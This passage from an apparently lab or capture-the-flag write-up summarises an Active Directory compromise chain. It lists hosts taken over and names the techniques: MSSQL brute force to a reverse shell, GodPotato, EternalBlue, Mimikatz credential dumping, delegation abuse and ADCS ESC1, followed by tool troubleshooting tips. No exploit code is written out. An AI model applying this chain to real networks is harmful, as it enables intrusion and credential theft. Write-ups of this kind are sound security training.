| WIN-PC8086 | 172.22.10.36 | NT AUTHORITY\SYSTEM | MS17-010 (EternalBlue) |
| WIN-PC8098 | 172.22.10.40 | aerospace\administrator | constrained delegation, S4U2Self + S4U2Proxy |
| DC01 | 172.22.10.11 | aerospace\administrator | ADCS ESC1 + LDAP shell password reset |
| CA | 172.22.10.13 | aerospace\administrator | lateral movement with the domain admin password |
Core techniques#
- MSSQL: weak-password brute force → xp_cmdshell command execution → PowerShell reverse shell
- Windows privilege escalation: SeImpersonatePrivilege + GodPotato, from the service account to SYSTEM
- MS17-010 (EternalBlue): the classic SMB remote code execution bug, giving SYSTEM directly
- Mimikatz credential dumping: plaintext passwords, NTLM hashes and machine-account credentials from LSASS memory
- Constrained delegation abuse: S4U2Self / S4U2Proxy to impersonate the domain admin against the delegated service
- ADCS ESC1: a misconfigured template (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) lets any enrollee request a certificate for an arbitrary user
- Fallback when PKINIT is unavailable: Schannel authentication to LDAPS, then an LDAP shell to reset the domain admin's password
- Lateral movement: pass-the-password over WMI remote execution to the remaining domain hosts
Pitfalls#
- Ticket save permission: getST.py run from a read-only directory (such as /usr/share/doc/) fails with Permission Denied; run it as root or from a writable directory
- DNS resolution: Kerberos authentication depends on hostname resolution, so the target hosts must be added to /etc/hosts
- xfreerdp syntax change: newer xfreerdp uses /cert:ignore rather than the older /cert-ignore
- PKINIT unsupported: when the DC cannot exchange the certificate for a TGT, fall back to the LDAP shell (Schannel) route
- certipy DNS resolution: pass -ns and -dc-ip so the domain controller's DNS is used; otherwise the default resolver cannot resolve the internal domain names